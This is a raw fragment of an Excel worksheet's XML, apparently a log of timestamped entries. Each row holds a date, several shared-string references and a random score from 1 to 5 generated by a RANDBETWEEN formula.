    <row r="27117" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A27117" s="1">
        <v>42894.194826388892</v>
      </c>
      <c r="C27117" t="s">
        <v>48</v>
      </c>
      <c r="E27117" s="2" t="s">
        <v>24674</v>
      </c>
      <c r="F27117">
        <f t="shared" ca="1" si="423"/>
        <v>3</v>
      </c>
    </row>
    <row r="27118" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27118" s="1">
        <v>42894.148125</v>
      </c>
      <c r="C27118" t="s">
        <v>71</v>
      </c>
      <c r="E27118" s="2" t="s">
        <v>24675</v>
      </c>
      <c r="F27118">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27119" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27119" s="1">
        <v>42894.11042824074</v>
      </c>
      <c r="C27119" t="s">
        <v>339</v>
      </c>
      <c r="E27119" s="2" t="s">
        <v>24676</v>
      </c>
      <c r="F27119">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27120" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27120" s="1">
        <v>42893.941770833335</v>
      </c>
      <c r="C27120" t="s">
        <v>140</v>
      </c>
      <c r="D27120" t="s">
        <v>46</v>
      </c>
      <c r="E27120" s="2" t="s">
        <v>24677</v>
      </c>
      <c r="F27120">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27121" s="1">
        <v>42893.82708333333</v>
      </c>
      <c r="C27121" t="s">
        <v>10</v>
      </c>
      <c r="D27121" t="s">
        <v>6</v>
      </c>
      <c r="E27121" t="s">
        <v>24678</v>
      </c>
      <c r="F27121">
        <f t="shared" ca="1" si="423"/>
        <v>2</v>
      </c>
    </row>
    <row r="27122" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27122" s="1">
        <v>42893.707465277781</v>
      </c>
      <c r="C27122" t="s">
        <v>280</v>
      </c>
      <c r="E27122" s="2" t="s">
        <v>24679</v>
      </c>
      <c r="F27122">
        <f t="shared" ca="1" si="423"/>
        <v>3</v>
      </c>
    </row>
    <row r="27123" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27123" s="1">
        <v>42893.690972222219</v>
      </c>
      <c r="C27123" t="s">
        <v>10</v>
      </c>
      <c r="D27123" t="s">
        <v>20</v>
      </c>
      <c r="E27123" s="2" t="s">
        <v>24680</v>
      </c>
      <c r="F27123">
        <f t="shared" ca="1" si="423"/>
        <v>1</v>
      </c>
    </row>
    <row r="27124" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27124" s="1">
        <v>42893.679456018515</v>
      </c>
      <c r="C27124" t="s">
        <v>10</v>
      </c>
      <c r="D27124" t="s">
        <v>89</v>
      </c>
      <c r="E27124" t="s">
        <v>24681</v>
      </c>
      <c r="F27124">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27125" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27125" s="1">
        <v>42893.678877314815</v>
      </c>
      <c r="C27125" t="s">
        <v>10</v>
      </c>
      <c r="D27125" t="s">
        <v>6</v>
      </c>
      <c r="E27125" t="s">
        <v>24682</v>
      </c>
      <c r="F27125">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27126" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27126" s="1">
        <v>42893.672291666669</v>
      </c>
      <c r="C27126" t="s">
        <v>118</v>
      </c>
      <c r="E27126" s="2" t="s">
        <v>24683</v>
      </c>
      <c r="F27126">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27127" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27127" s="1">
        <v>42893.671666666669</v>
      </c>
      <c r="C27127" t="s">
        <v>10</v>
      </c>
      <c r="D27127" t="s">
        <v>6</v>
      </c>
      <c r="E27127" t="s">
        <v>24684</v>
      </c>
      <c r="F27127">
        <f t="shared" ca="1" si="423"/>
        <v>3</v>
      </c>
    </row>
    <row r="27128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27128" s="1">
        <v>42893.632685185185</v>
      </c>
      <c r="C27128" t="s">
        <v>10</v>
      </c>
      <c r="D27128" t="s">
        <v>494</v>
      </c>
      <c r="E27128" t="s">
        <v>24685</v>
      </c>
      <c r="F27128">
        <f t="shared" ca="1" si="423"/>
        <v>4</v>
      </c>
    </row>
    <row r="27129" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27129" s="1">
        <v>42893.632615740738</v>
      </c>
      <c r="C27129" t="s">
        <v>10</v>
      </c>
      <c r="D27129" t="s">
        <v>52</v>
      </c>
      <c r="E27129" s="2" t="s">
        <v>24686</v>
      </c>
      <c r="F27129">
        <f t="shared" ca="1" si="423"/>
        <v>3</v>
      </c>
    </row>
    <row r="27130" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27130" s="1">
        <v>42893.61078703704</v>
      </c>
      <c r="C27130" t="s">
        <v>10</v>
      </c>
      <c r="D27130" t="s">
        <v>178</v>
      </c>
      <c r="E27130" t="s">
        <v>24687</v>
      </c>
      <c r="F27130">
        <f t="shared" ca="1" si="423"/>
        <v>1</v>
      </c>
    </row>
    <row r="27131" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27131" s="1">
        <v>42893.609803240739</v>
      </c>
      <c r="C27131" t="s">
        <v>10</v>
      </c>
      <c r="D27131" t="s">
        <v>251</v>
      </c>
      <c r="E27131" s="2" t="s">
        <v>24688</v>
      </c>
      <c r="F27131">
        <f t="shared" ca="1" si="423"/>
        <v>1</v>
      </c>
    </row>
    <row r="27132" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27132" s="1">
        <v>42893.601018518515</v>
      </c>
      <c r="C27132" t="s">
        <v>10</v>
      </c>
      <c r="D27132" t="s">
        <v>290</v>
      </c>
      <c r="E27132" s="2" t="s">
        <v>24689</v>
      </c>
      <c r="F27132">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27133" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27133" s="1">
        <v>42893.598449074074</v>
      </c>
      <c r="C27133" t="s">
        <v>60</v>
      </c>
      <c r="E27133" t="s">
        <v>24690</v>
      </c>
      <c r="F27133">
        <f t="shared" ca="1" si="423"/>
        <v>1</v>
      </c>
    </row>
    <row r="27134" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27134" s="1">
        <v>42893.598032407404</v>
      </c>
      <c r="C27134" t="s">
        <v>60</v>
      </c>
      <c r="E27134" t="s">
        <v>24691</v>
      </c>
      <c r="F27134">
        <f t="shared" ca="1" si="423"/>
        <v>2</v>
      </c>
    </row>
    <row r="27135" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27135" s="1">
        <v>42893.596759259257</v>
      </c>
      <c r="C27135" t="s">
        <v>103</v>
      </c>
      <c r="E27135" s="2" t="s">
        <v>24692</v>
      </c>
      <c r="F27135">
        <f t="shared" ca="1" si="423"/>
        <v>1</v>
      </c>
    </row>
    <row r="27136" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27136" s="1">
        <v>42893.59207175926</v>
      </c>
      <c r="C27136" t="s">
        <v>10</v>
      </c>
      <c r="D27136" t="s">
        <v>17</v>
      </c>
      <c r="E27136" s="2" t="s">
        <v>24693</v>
      </c>
      <c r="F27136">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27137" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27137" s="1">
        <v>42893.579664351855</v>
      </c>
      <c r="C27137" t="s">
        <v>6</v>
      </c>
      <c r="D27137" t="s">
        <v>25</v>
      </c>
      <c r="E27137" t="s">
        <v>24694</v>
      </c>
      <c r="F27137">
        <f t="shared" ca="1" si="423"/>
        <v>5</v>
      </c>
    </row>
    <row r="27138" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27138" s="1">
        <v>42893.578819444447</v>
      </c>
      <c r="C27138" t="s">
        <v>10</v>
      </c>
      <c r="D27138" t="s">
        <v>52</v>
      </c>
      <c r="E27138" t="s">
        <v>24695</v>
      </c>
      <c r="F27138">
        <f t="shared" ref="F27138:F27201" ca="1" si="424">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="27139" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27139" s="1">
        <v>42893.569479166668</v>
      </c>
      <c r="C27139" t="s">
        <v>6</v>
      </c>
      <c r="D27139" t="s">
        <v>114</v>
      </c>
      <c r="E27139" t="s">
        <v>24696</v>
      </c>
      <c r="F27139">
        <f t="shared" ca="1" si="424"/>
        <v>5</v>
      </c>
    </row>
    <row r="27140" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A27140" s="1">
        <v>42893.554571759261</v>
      </c>
      <c r="C27140" t="s">
        <v>10</v>
      </c>
      <c r="D27140" t="s">
        <v>17</v>
      </c>
      <c r="E27140" s="2" t="s">
        <v>24697</v>
      </c>
      <c r="F27140">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27141" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27141" s="1">
        <v>42893.553807870368</v>
      </c>
      <c r="C27141" t="s">
        <v>2082</v>
      </c>
      <c r="E27141" t="s">
        <v>24698</v>
      </c>
      <c r="F27141">
        <f t="shared" ca="1" si="424"/>
        <v>5</v>
      </c>
    </row>
    <row r="27142" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27142" s="1">
        <v>42893.547361111108</v>
      </c>
      <c r="C27142" t="s">
        <v>10</v>
      </c>
      <c r="D27142" t="s">
        <v>6</v>
      </c>
      <c r="E27142" t="s">
        <v>24699</v>
      </c>
      <c r="F27142">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27143" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27143" s="1">
        <v>42893.507777777777</v>
      </c>
      <c r="C27143" t="s">
        <v>10</v>
      </c>
      <c r="D27143" t="s">
        <v>290</v>
      </c>
      <c r="E27143" t="s">
        <v>24700</v>
      </c>
      <c r="F27143">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27144" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27144" s="1">
        <v>42893.483865740738</v>
      </c>
      <c r="C27144" t="s">
        <v>260</v>
      </c>
      <c r="E27144" t="s">
        <v>24701</v>
      </c>
      <c r="F27144">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27145" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27145" s="1">
        <v>42893.482627314814</v>
      </c>
      <c r="C27145" t="s">
        <v>10</v>
      </c>
      <c r="D27145" t="s">
        <v>244</v>
      </c>
      <c r="E27145" s="2" t="s">
        <v>24702</v>
      </c>
      <c r="F27145">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27146" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27146" s="1">
        <v>42893.479803240742</v>
      </c>
      <c r="C27146" t="s">
        <v>10</v>
      </c>
      <c r="D27146" t="s">
        <v>20</v>
      </c>
      <c r="E27146" t="s">
        <v>24703</v>
      </c>
      <c r="F27146">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27147" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27147" s="1">
        <v>42893.456666666665</v>
      </c>
      <c r="C27147" t="s">
        <v>10</v>
      </c>
      <c r="D27147" t="s">
        <v>263</v>
      </c>
      <c r="E27147" t="s">
        <v>24704</v>
      </c>
      <c r="F27147">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27148" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27148" s="1">
        <v>42893.449421296296</v>
      </c>
      <c r="C27148" t="s">
        <v>6</v>
      </c>
      <c r="D27148" t="s">
        <v>25</v>
      </c>
      <c r="E27148" s="2" t="s">
        <v>24705</v>
      </c>
      <c r="F27148">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27149" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A27149" s="1">
        <v>42893.446053240739</v>
      </c>
      <c r="C27149" t="s">
        <v>43</v>
      </c>
      <c r="E27149" s="2" t="s">
        <v>24706</v>
      </c>
      <c r="F27149">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27150" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27150" s="1">
        <v>42893.425844907404</v>
      </c>
      <c r="C27150" t="s">
        <v>10</v>
      </c>
      <c r="D27150" t="s">
        <v>89</v>
      </c>
      <c r="E27150" s="2" t="s">
        <v>24707</v>
      </c>
      <c r="F27150">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27151" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27151" s="1">
        <v>42893.412280092591</v>
      </c>
      <c r="C27151" t="s">
        <v>10</v>
      </c>
      <c r="D27151" t="s">
        <v>20</v>
      </c>
      <c r="E27151" t="s">
        <v>24708</v>
      </c>
      <c r="F27151">
        <f t="shared" ca="1" si="424"/>
        <v>1</v>
      </c>
    </row>
    <row r="27152" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27152" s="1">
        <v>42893.388865740744</v>
      </c>
      <c r="C27152" t="s">
        <v>10</v>
      </c>
      <c r="D27152" t="s">
        <v>374</v>
      </c>
      <c r="E27152" t="s">
        <v>24709</v>
      </c>
      <c r="F27152">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27153" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27153" s="1">
        <v>42893.383113425924</v>
      </c>
      <c r="C27153" t="s">
        <v>41</v>
      </c>
      <c r="E27153" t="s">
        <v>24710</v>
      </c>
      <c r="F27153">
        <f t="shared" ca="1" si="424"/>
        <v>1</v>
      </c>
    </row>
    <row r="27154" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27154" s="1">
        <v>42893.38040509259</v>
      </c>
      <c r="C27154" t="s">
        <v>10</v>
      </c>
      <c r="D27154" t="s">
        <v>374</v>
      </c>
      <c r="F27154">
        <f t="shared" ca="1" si="424"/>
        <v>1</v>
      </c>
    </row>
    <row r="27155" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27155" s="1">
        <v>42893.353981481479</v>
      </c>
      <c r="C27155" t="s">
        <v>48</v>
      </c>
      <c r="E27155" t="s">
        <v>24711</v>
      </c>
      <c r="F27155">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27156" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27156" s="1">
        <v>42893.341817129629</v>
      </c>
      <c r="C27156" t="s">
        <v>10</v>
      </c>
      <c r="D27156" t="s">
        <v>163</v>
      </c>
      <c r="E27156" t="s">
        <v>24712</v>
      </c>
      <c r="F27156">
        <f t="shared" ca="1" si="424"/>
        <v>5</v>
      </c>
    </row>
    <row r="27157" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A27157" s="1">
        <v>42893.315833333334</v>
      </c>
      <c r="C27157" t="s">
        <v>48</v>
      </c>
      <c r="E27157" s="2" t="s">
        <v>24713</v>
      </c>
      <c r="F27157">
        <f t="shared" ca="1" si="424"/>
        <v>1</v>
      </c>
    </row>
    <row r="27158" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27158" s="1">
        <v>42893.315798611111</v>
      </c>
      <c r="C27158" t="s">
        <v>41</v>
      </c>
      <c r="E27158" s="2" t="s">
        <v>24714</v>
      </c>
      <c r="F27158">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27159" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27159" s="1">
        <v>42893.245682870373</v>
      </c>
      <c r="C27159" t="s">
        <v>73</v>
      </c>
      <c r="E27159" t="s">
        <v>24715</v>
      </c>
      <c r="F27159">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27160" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A27160" s="1">
        <v>42893.225092592591</v>
      </c>
      <c r="C27160" t="s">
        <v>65</v>
      </c>
      <c r="E27160" s="2" t="s">
        <v>24716</v>
      </c>
      <c r="F27160">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27161" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27161" s="1">
        <v>42893.196157407408</v>
      </c>
      <c r="C27161" t="s">
        <v>41</v>
      </c>
      <c r="E27161" t="s">
        <v>24717</v>
      </c>
      <c r="F27161">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27162" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27162" s="1">
        <v>42893.183576388888</v>
      </c>
      <c r="C27162" t="s">
        <v>14</v>
      </c>
      <c r="E27162" t="s">
        <v>24718</v>
      </c>
      <c r="F27162">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27163" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27163" s="1">
        <v>42893.179664351854</v>
      </c>
      <c r="C27163" t="s">
        <v>10</v>
      </c>
      <c r="D27163" t="s">
        <v>251</v>
      </c>
      <c r="E27163" s="2" t="s">
        <v>24719</v>
      </c>
      <c r="F27163">
        <f t="shared" ca="1" si="424"/>
        <v>1</v>
      </c>
    </row>
    <row r="27164" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27164" s="1">
        <v>42893.155011574076</v>
      </c>
      <c r="C27164" t="s">
        <v>71</v>
      </c>
      <c r="E27164" s="2" t="s">
        <v>24720</v>
      </c>
      <c r="F27164">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27165" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27165" s="1">
        <v>42893.139756944445</v>
      </c>
      <c r="C27165" t="s">
        <v>41</v>
      </c>
      <c r="E27165" s="2" t="s">
        <v>24721</v>
      </c>
      <c r="F27165">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27166" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27166" s="1">
        <v>42893.116979166669</v>
      </c>
      <c r="C27166" t="s">
        <v>41</v>
      </c>
      <c r="E27166" t="s">
        <v>24722</v>
      </c>
      <c r="F27166">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27167" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27167" s="1">
        <v>42893.115949074076</v>
      </c>
      <c r="C27167" t="s">
        <v>41</v>
      </c>
      <c r="E27167" t="s">
        <v>24723</v>
      </c>
      <c r="F27167">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27168" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27168" s="1">
        <v>42893.108206018522</v>
      </c>
      <c r="C27168" t="s">
        <v>253</v>
      </c>
      <c r="E27168" s="2" t="s">
        <v>24724</v>
      </c>
      <c r="F27168">
        <f t="shared" ca="1" si="424"/>
        <v>1</v>
      </c>
    </row>
    <row r="27169" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27169" s="1">
        <v>42893.021469907406</v>
      </c>
      <c r="C27169" t="s">
        <v>73</v>
      </c>
      <c r="E27169" s="2" t="s">
        <v>24725</v>
      </c>
      <c r="F27169">
        <f t="shared" ca="1" si="424"/>
        <v>5</v>
      </c>
    </row>
    <row r="27170" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A27170" s="1">
        <v>42892.995300925926</v>
      </c>
      <c r="C27170" t="s">
        <v>139</v>
      </c>
      <c r="E27170" s="2" t="s">
        <v>24726</v>
      </c>
      <c r="F27170">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27171" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27171" s="1">
        <v>42892.906307870369</v>
      </c>
      <c r="C27171" t="s">
        <v>139</v>
      </c>
      <c r="D27171" t="s">
        <v>163</v>
      </c>
      <c r="E27171" s="2" t="s">
        <v>24727</v>
      </c>
      <c r="F27171">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27172" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27172" s="1">
        <v>42892.880057870374</v>
      </c>
      <c r="C27172" t="s">
        <v>10</v>
      </c>
      <c r="D27172" t="s">
        <v>89</v>
      </c>
      <c r="E27172" t="s">
        <v>24728</v>
      </c>
      <c r="F27172">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27173" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27173" s="1">
        <v>42892.778912037036</v>
      </c>
      <c r="C27173" t="s">
        <v>10</v>
      </c>
      <c r="D27173" t="s">
        <v>36</v>
      </c>
      <c r="E27173" t="s">
        <v>24729</v>
      </c>
      <c r="F27173">
        <f t="shared" ca="1" si="424"/>
        <v>5</v>
      </c>
    </row>
    <row r="27174" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27174" s="1">
        <v>42892.754479166666</v>
      </c>
      <c r="C27174" t="s">
        <v>71</v>
      </c>
      <c r="E27174" s="2" t="s">
        <v>24730</v>
      </c>
      <c r="F27174">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27175" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27175" s="1">
        <v>42892.733506944445</v>
      </c>
      <c r="C27175" t="s">
        <v>6</v>
      </c>
      <c r="D27175" t="s">
        <v>67</v>
      </c>
      <c r="E27175" t="s">
        <v>24731</v>
      </c>
      <c r="F27175">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27176" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27176" s="1">
        <v>42892.706828703704</v>
      </c>
      <c r="C27176" t="s">
        <v>154</v>
      </c>
      <c r="E27176" t="s">
        <v>24732</v>
      </c>
      <c r="F27176">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27177" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27177" s="1">
        <v>42892.698159722226</v>
      </c>
      <c r="C27177" t="s">
        <v>82</v>
      </c>
      <c r="E27177" t="s">
        <v>24733</v>
      </c>
      <c r="F27177">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27178" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A27178" s="1">
        <v>42892.688472222224</v>
      </c>
      <c r="C27178" t="s">
        <v>10</v>
      </c>
      <c r="D27178" t="s">
        <v>244</v>
      </c>
      <c r="E27178" s="2" t="s">
        <v>24734</v>
      </c>
      <c r="F27178">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27179" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27179" s="1">
        <v>42892.676921296297</v>
      </c>
      <c r="C27179" t="s">
        <v>10</v>
      </c>
      <c r="D27179" t="s">
        <v>46</v>
      </c>
      <c r="E27179" t="s">
        <v>24735</v>
      </c>
      <c r="F27179">
        <f t="shared" ca="1" si="424"/>
        <v>5</v>
      </c>
    </row>
    <row r="27180" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27180" s="1">
        <v>42892.662638888891</v>
      </c>
      <c r="C27180" t="s">
        <v>65</v>
      </c>
      <c r="E27180" s="2" t="s">
        <v>24736</v>
      </c>
      <c r="F27180">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27181" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27181" s="1">
        <v>42892.656111111108</v>
      </c>
      <c r="C27181" t="s">
        <v>10</v>
      </c>
      <c r="D27181" t="s">
        <v>89</v>
      </c>
      <c r="E27181" t="s">
        <v>24737</v>
      </c>
      <c r="F27181">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27182" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A27182" s="1">
        <v>42892.649097222224</v>
      </c>
      <c r="C27182" t="s">
        <v>65</v>
      </c>
      <c r="E27182" s="2" t="s">
        <v>24738</v>
      </c>
      <c r="F27182">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27183" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27183" s="1">
        <v>42892.643946759257</v>
      </c>
      <c r="C27183" t="s">
        <v>10</v>
      </c>
      <c r="D27183" t="s">
        <v>52</v>
      </c>
      <c r="E27183" t="s">
        <v>24739</v>
      </c>
      <c r="F27183">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27184" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A27184" s="1">
        <v>42892.642893518518</v>
      </c>
      <c r="C27184" t="s">
        <v>10</v>
      </c>
      <c r="D27184" t="s">
        <v>6</v>
      </c>
      <c r="E27184" s="2" t="s">
        <v>24740</v>
      </c>
      <c r="F27184">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27185" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27185" s="1">
        <v>42892.559062499997</v>
      </c>
      <c r="C27185" t="s">
        <v>10</v>
      </c>
      <c r="D27185" t="s">
        <v>151</v>
      </c>
      <c r="E27185" t="s">
        <v>24741</v>
      </c>
      <c r="F27185">
        <f t="shared" ca="1" si="424"/>
        <v>1</v>
      </c>
    </row>
    <row r="27186" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A27186" s="1">
        <v>42892.551898148151</v>
      </c>
      <c r="C27186" t="s">
        <v>6</v>
      </c>
      <c r="D27186" t="s">
        <v>25</v>
      </c>
      <c r="E27186" s="2" t="s">
        <v>24742</v>
      </c>
      <c r="F27186">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27187" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27187" s="1">
        <v>42892.521805555552</v>
      </c>
      <c r="C27187" t="s">
        <v>10</v>
      </c>
      <c r="D27187" t="s">
        <v>11</v>
      </c>
      <c r="E27187" s="2" t="s">
        <v>24743</v>
      </c>
      <c r="F27187">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27188" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A27188" s="1">
        <v>42892.49496527778</v>
      </c>
      <c r="C27188" t="s">
        <v>10</v>
      </c>
      <c r="D27188" t="s">
        <v>6</v>
      </c>
      <c r="E27188" s="2" t="s">
        <v>24744</v>
      </c>
      <c r="F27188">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27189" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27189" s="1">
        <v>42892.491446759261</v>
      </c>
      <c r="C27189" t="s">
        <v>48</v>
      </c>
      <c r="E27189" s="2" t="s">
        <v>24745</v>
      </c>
      <c r="F27189">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27190" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A27190" s="1">
        <v>42892.475949074076</v>
      </c>
      <c r="C27190" t="s">
        <v>10</v>
      </c>
      <c r="D27190" t="s">
        <v>80</v>
      </c>
      <c r="E27190" s="2" t="s">
        <v>24746</v>
      </c>
      <c r="F27190">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27191" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A27191" s="1">
        <v>42892.459027777775</v>
      </c>
      <c r="C27191" t="s">
        <v>48</v>
      </c>
      <c r="E27191" s="2" t="s">
        <v>24747</v>
      </c>
      <c r="F27191">
        <f t="shared" ca="1" si="424"/>
        <v>5</v>
      </c>
    </row>
    <row r="27192" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27192" s="1">
        <v>42892.456446759257</v>
      </c>
      <c r="C27192" t="s">
        <v>10</v>
      </c>
      <c r="D27192" t="s">
        <v>6</v>
      </c>
      <c r="E27192" t="s">
        <v>24748</v>
      </c>
      <c r="F27192">
        <f t="shared" ca="1" si="424"/>
        <v>1</v>
      </c>
    </row>
    <row r="27193" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27193" s="1">
        <v>42892.423900462964</v>
      </c>
      <c r="C27193" t="s">
        <v>124</v>
      </c>
      <c r="E27193" t="s">
        <v>24749</v>
      </c>
      <c r="F27193">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27194" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27194" s="1">
        <v>42892.4059375</v>
      </c>
      <c r="C27194" t="s">
        <v>71</v>
      </c>
      <c r="E27194" s="2" t="s">
        <v>24750</v>
      </c>
      <c r="F27194">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27195" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27195" s="1">
        <v>42892.39539351852</v>
      </c>
      <c r="C27195" t="s">
        <v>559</v>
      </c>
